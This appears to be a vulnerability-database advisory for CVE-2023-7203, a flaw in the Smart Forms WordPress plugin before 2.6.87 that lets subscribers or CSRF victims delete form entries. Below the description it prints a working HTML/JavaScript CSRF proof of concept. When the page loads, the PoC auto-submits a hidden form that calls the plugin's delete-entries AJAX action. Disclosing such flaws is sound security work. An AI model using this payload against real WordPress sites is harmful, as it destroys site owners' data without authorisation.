Lucene search
Mohammad Reza OmraniWPEX-ID:B514B631-C3E3-4793-AB5D-35ED0C38B011HistoryFeb 02, 2024 - 12:00 a.m.
Smart Forms < 2.6.87 - Subscriber+ Arbitrary Entry Deletion
2024-02-0200:00:00
Mohammad Reza Omrani
55
smart forms
arbitrary entry deletion
vulnerability
Description The plugin does not have authorisation in various AJAX actions, which could allow users with a role as low as subscriber to call them and perform unauthorised actions such as deleting entries. The plugin also lacks CSRF checks in some places which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as deleting entries.
<!DOCTYPE html>
<html>
<body>
<script>
const formData = new FormData();
formData.append('action', 'rednao_smart_form_delete_entries');
formData.append('data', '{"Ids":["1","2"]}');
const csrfForm = document.createElement('form');
csrfForm.method = 'POST';
csrfForm.action = 'https://example.com/wp-admin/admin-ajax.php';
csrfForm.enctype = 'multipart/form-data';
const boundary = '----WebKitFormBoundaryAFcqGF5eShv7ARup';
csrfForm.setAttribute('boundary', boundary);
for (const pair of formData) {
const input = document.createElement('input');
input.type = 'hidden';
input.name = pair[0];
input.value = pair[1];
csrfForm.appendChild(input);
}
document.body.appendChild(csrfForm);
csrfForm.submit();
</script>
</body>
</html>Related
cvelist
cvelist
CVE-2023-7203 Smart Forms < 2.6.87 - Subscriber+ Arbitrary Entry Deletion
2024-02-27 08:30:25
nvd
nvd
CVE-2023-7203
2024-02-27 09:15:37
prion
prion
Cross site request forgery (csrf)
2024-02-27 09:15:00
cve
cve
CVE-2023-7203
2024-02-27 09:15:37
wpvulndb
wpvulndb
Smart Forms < 2.6.87 - Subscriber+ Arbitrary Entry Deletion
2024-02-02 00:00:00
vulnrichment
vulnrichment
CVE-2023-7203 Smart Forms < 2.6.87 - Subscriber+ Arbitrary Entry Deletion
2024-02-27 08:30:25
AI Score
6.7
Confidence
Low
EPSS
0
Percentile
9.0%
Related for WPEX-ID:B514B631-C3E3-4793-AB5D-35ED0C38B011